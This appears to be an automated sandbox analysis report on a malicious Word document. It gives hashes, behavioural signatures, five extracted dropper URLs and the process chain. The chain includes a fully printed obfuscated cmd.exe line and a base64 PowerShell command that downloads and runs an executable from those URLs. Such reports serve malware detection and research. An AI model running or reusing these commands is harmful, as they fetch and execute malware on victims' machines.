Analysis

  • max time kernel
    145s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-04-2024 14:56

General

  • Target

    07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118.doc

  • Size

    83KB

  • MD5

    07ee44f9fa9188be620b38bd4494fd6c

  • SHA1

    b079fbd5595c53ff4b8aee51aaece7792fb2eef6

  • SHA256

    fa22225bbaa33be9c57bf5bc3588b3e5dd4a6bcd531eb10fdf28ae5dc7c950f6

  • SHA512

    f86324391f3d32f7dde4d65bc70cfc1a260ae0b48dfa992bef94b604f775af0d0ed949245e8e6aff3163b788df0719f33502f0c9c0f49357d3360a95faa91db5

  • SSDEEP

    1536:SptJlmrJpmxlRw99NBk+aHJU4rTDUdUNAMeWT:Ote2dw99fb4r3UdqAMe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blog.bctianfu.cn/4

exe.dropper

http://mail.vcacademy.lk/5nLo

exe.dropper

http://lamemoria.in/2ib2Pt

exe.dropper

http://tropicalislandrealtyofflorida.com/NNqM7W

exe.dropper

http://businessarbitr.ru/E

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v^:^ON^ ^ /c" ^Se^T ^ A^K=A^ACA^gAA^I^A^ACA^gA^A^I^A^AC^A^gAAIA^ACAg^A^AI^A^ACA^gAA^I^A^ACAgAQfA0^H^A7^BA^a^AMG^A0^BQ^Y^AM^GA9^B^w^O^As^GAh^B^QZ^A^I^HAiBwOAc^EAC^B^A^aA^QC^A^g^A^QbA^UG^A^0B^QSA^0CAlBwaA8GA^2B^gb^AkEA^7A^QKAc^E^AC^B^A^a^AQC^A^gAALAU^EAjBw^Q^A^QC^A^oAQZA^wG^A^p^BgR^AQG^Ah^Bwb^AwGAu^B^w^d^A8^G^AE^B^g^L^AE^F^A^zBgQAQCA7^BQ^e^AI^H^A0^Bwe^A^kC^AV^BAcAk^GA^kA^A^IA^4^GAp^B^AI^AU^E^A^jB^w^QA^QC^A^o^A^AaA^MG^A^hB^Q^Z^AIHAv^BgZA^s^DAn^A^QZ^A^g^H^A^lB^g^LAcC^Ar^A^QdAsGAH^BA^JAsC^AnA^A^X^AcCAr^Aw^Y^A^kG^A^sB^gY^AUHA^w^BgO^A^Y^H^A^u^B^Q^Z^A^QC^A^9A^wRA^IEA^oB^A^JAsD^AnAwNAAD^A3^AwJAACA9^AA^IA^U^H^ArBwRA^QCA^7A^QK^AcCA^ABwJA^gCA^0BQaA^wGAw^B^w^U^A4C^AnA^QR^A^8C^A1^Bgc^A^4C^A^yB^A^d^Ak^GA^i^B^gc^A^E^GAzBwc^A^UGAu^BQ^aAM^H^A^1^Bg^Y^A^8CAv^A^g^O^AAHA^0BA^d^A^gG^A^AB^wV^AcD^AN^BQcA^4E^AOBw^L^A0GAv^BwY^A4CAhB^AZA^kGAyBwbAw^G^A^mB^gZ^A8GA^5B^AdA^wGAhBQ^Z^AIH^Ak^Bgb^A^EG^As^BwcAkG^As^B^QY^AMG^ApBAc^A^8G^AyBAdA8CAvA^g^OA^AH^A0^B^A^dAgG^AA^B^A^dAA^FAyA^g^YA^k^GA^y^A^wL^A^4^G^A^pB^gLA^E^GAp^B^gcA8^G^A^tB^Q^Z^A0^GAhBAbA8CAvA^gOAAHA0BA^dA^g^G^A^A^B^wbAw^E^A^u^BQN^A^8CArBAb^A^4CA^5^BQ^b^AU^GA^kBQY^A^MGA^h^B^wY^AYH^Au^AAb^A^k^G^AhB^QbA^8C^Av^AgO^A^AH^A0BA^d^A^gGA^A^B^ANA^8CA^u^BwYA4C^A1B^g^Z^A^4^G^Ah^B^Q^aA^QHA^jBg^YA^4CAn^Bwb^AwG^AiB^w^LA^8C^A^6AAcA^QH^A0^BAa^AcCA9A^QVAA^H^A^p^BAJA^sDA0^BgbA^UGA^p^B^AbA^M^E^AiBQZ^Ac^F^AuAAd^A^U^G^A^O^BAI^A^Q^HAjB^QZAoGA^i^B^w^bA0C^A3B^Q^Z^A4GA9A^QUAMHAC^B^AJ^ ^e- lle^h^sr^ewop&& ^F^oR /^L %^9 ^iN (^ ^ ^ ^965^ ^, ^ ^ -1 ,^ ^ ^0) ^dO ^S^Et G^Fr^1=!G^Fr^1!!A^K:~ %^9, 1!& ^i^F %^9 LsS ^1 cA^l^L %G^Fr^1:^~-^966% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3836
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JABCAHMAUQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAHAAVQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AYgBjAHQAaQBhAG4AZgB1AC4AYwBuAC8ANABAAGgAdAB0AHAAOgAvAC8AbQBhAGkAbAAuAHYAYwBhAGMAYQBkAGUAbQB5AC4AbABrAC8ANQBuAEwAbwBAAGgAdAB0AHAAOgAvAC8AbABhAG0AZQBtAG8AcgBpAGEALgBpAG4ALwAyAGkAYgAyAFAAdABAAGgAdAB0AHAAOgAvAC8AdAByAG8AcABpAGMAYQBsAGkAcwBsAGEAbgBkAHIAZQBhAGwAdAB5AG8AZgBmAGwAbwByAGkAZABhAC4AYwBvAG0ALwBOAE4AcQBNADcAVwBAAGgAdAB0AHAAOgAvAC8AYgB1AHMAaQBuAGUAcwBzAGEAcgBiAGkAdAByAC4AcgB1AC8ARQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARwBrAHUAIAA9ACAAJwA3ADAANwAnADsAJABoAEIARwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABHAGsAdQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwBjAEUAIABpAG4AIAAkAGkAcABVACkAewB0AHIAeQB7ACQAQgBzAFEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAQwBjAEUALAAgACQAaABCAEcAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAaABCAEcAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4392

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD7C78.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgtj3vau.jh1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3672-20-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-9-0x00007FFF57DF0000-0x00007FFF57E00000-memory.dmp

    Filesize

    64KB

  • memory/3672-4-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-5-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-0-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-8-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-6-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-18-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-10-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-17-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-12-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-14-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-13-0x00007FFF57DF0000-0x00007FFF57E00000-memory.dmp

    Filesize

    64KB

  • memory/3672-15-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-16-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-19-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-7-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-3-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-11-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-36-0x00000238F73A0000-0x00000238F8370000-memory.dmp

    Filesize

    15.8MB

  • memory/3672-37-0x00000238F14F0000-0x00000238F18F0000-memory.dmp

    Filesize

    4.0MB

  • memory/3672-38-0x00000238F73A0000-0x00000238F8370000-memory.dmp

    Filesize

    15.8MB

  • memory/3672-560-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-1-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-2-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-533-0x00007FFF99DD0000-0x00007FFF99FC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3672-534-0x00000238F73A0000-0x00000238F8370000-memory.dmp

    Filesize

    15.8MB

  • memory/3672-535-0x00000238F14F0000-0x00000238F18F0000-memory.dmp

    Filesize

    4.0MB

  • memory/3672-536-0x00000238F73A0000-0x00000238F8370000-memory.dmp

    Filesize

    15.8MB

  • memory/3672-557-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-558-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-556-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/3672-559-0x00007FFF59E50000-0x00007FFF59E60000-memory.dmp

    Filesize

    64KB

  • memory/4392-39-0x0000020D0F8A0000-0x0000020D0F8C2000-memory.dmp

    Filesize

    136KB